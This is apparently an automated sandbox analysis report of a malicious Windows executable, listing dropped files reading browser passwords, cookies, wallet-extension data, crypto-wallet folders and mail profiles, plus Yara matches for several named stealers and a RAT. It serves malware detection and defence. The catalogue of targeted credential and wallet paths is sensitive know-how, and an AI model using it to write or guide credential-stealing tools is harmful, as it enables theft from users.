Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Searches for user specific document files

Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe

Directory queried: C:\Users\user\Documents

Yara detected Credential Stealer

Source: Yara match	File source: Process Memory Space: rYuCm9r3mZzk_0VrthAnPu8c.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.pRIMqfuwRZ49ldgjUZ_z2py6.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2417687969.0000000004648000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.1955136682.0000000000315000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wDFs1SzoVQiT2__nQmbIm6Rg.exe PID: 7800, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 16.2.H14SDf_AWcPvvQK5Xx97sISX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hvkESMr10WtP7_E6btIJmDx0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rYuCm9r3mZzk_0VrthAnPu8c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2542152281.0000000005F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2416770410.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2416630360.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2418840174.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hvkESMr10WtP7_E6btIJmDx0.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZzpT5hwyVjlAXfLjB1r1iwOX.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rYuCm9r3mZzk_0VrthAnPu8c.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Jl9_JMpull8yLuWoc7AXV8O.zip, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000031.00000002.3127540718.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3128895190.0000000000A71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: softjenimmp3converter.exe PID: 3992, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9RJ0JeM9uj2rfsuq_woBmmIY.exe PID: 7816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE

Windows Analysis Report
WlCIinu0yp.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1434501
Product:	CloudBasic
Start time:	08:39:24
Start date:	01.05.2024
Sample:	WlCIinu0yp.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	28d853922cf07f58ea8f4a81492120ae
SHA1:	e957c503b201179bc7901256bf37ff292705e805
SHA256:	e62b73e7f0b73dcdcf303dcd3f587a54a684d0ab4c0dd1e90b3a8b39502a9a38
Filetype:	Win64 Executable (generic) (12005/4) 74.95%

Windows Analysis Report WlCIinu0yp.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
WlCIinu0yp.exe

Malware Threat Intel
Provided by